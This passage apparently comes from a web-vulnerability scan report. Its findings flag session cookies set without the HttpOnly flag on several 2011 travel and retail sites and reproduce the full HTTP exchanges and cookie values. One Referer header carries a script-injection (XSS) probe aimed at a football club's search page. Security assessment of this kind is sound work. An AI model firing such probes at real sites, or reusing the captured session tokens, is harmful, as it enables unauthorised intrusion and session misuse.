Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX01B27DF898$F1$88002000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; Domain=.expedia.com; Path=/
Set-Cookie: p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:06:28 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":5,"BookingCount":3,"HotelId":894999,"isValidViewCount":true,"isValidBookingCount":true}]}

14.71. http://www.hublot.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hublot.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 301 Moved Permanently
Location: /en/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:58:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; path=/


14.72. http://www.jscache.com/weimg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jscache.com
Path:   /weimg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weimg?itype=langs/en/tripadvisor_logo_207x51-12811-0.gif&lang=en HTTP/1.1
Host: www.jscache.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 165
Content-Type: application/x-javascript;charset=UTF-8
Expires: Mon, 03 Oct 2011 00:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:38:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:43 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.BC649BA2FF72A3D5B3A8EB2418B261B6*SQ.2*LS.weimg*GR.43*TCPAR.79*TBR.64*EXEX.37*ABTR.55*PPRP.72*PHTB.89*FS.64*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.3*DF.0*FP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LP.%2Fweimg%3Flang%3Den%26itype%3Dlangs%252Fen%252Ftripadvisor_logo_207x51-12811-0%5C.gif*FS.32*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/

document.write( '<img src="http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif" style="border:none; margin:0;" alt=" TripAdvisor"/>' );

14.73. http://www.priceline.com/QP.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /QP.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=priceline&grp=9706&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=154&pos=1&aii=d1125990-8f30-4f2a-83dc-0b115fb728a1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7684
Content-Type: text/html
Set-Cookie: Referral=CLICKID=HOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A43&ID=IGOUGO; expires=Wed, 02-Nov-2011 00:09:42 GMT; domain=.priceline.com; path=/
Set-Cookie: PSessKey=721510AC6F1410AC2011100300094354c311228538; domain=.priceline.com; path=/
Set-Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; expires=Thu, 30-Sep-2021 00:09:42 GMT; domain=.priceline.com; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Cache-Control" CONTENT="no cache">
<meta HTTP-EQUIV="Pragma" CONTENT="no cache">
<meta HTTP-EQUIV="Expires" CONTENT="0">
<meta HTTP-EQUIV="content-type"
...[SNIP]...

14.74. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...

14.75. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=85194181F8EF5609A9FA7C933BC61666.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...

14.76. http://www.tripadvisor.com/CheckMore

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...

14.77. http://www.tripadvisor.com/Commerce

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Commerce?p=Expedia&src=32623573&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=1&cnt=6&oos=4&silo=910&bucket=1739&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 01:01:57 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:01:57 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2332.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.6*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: PCT=%7B%22p-2332%22%3A1%7D; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Location: http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8


14.78. http://www.tripadvisor.com/HotelCheckRates

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->

14.79. http://www.tripadvisor.com/SmartDeals-g1-m11893

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g1-m11893

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

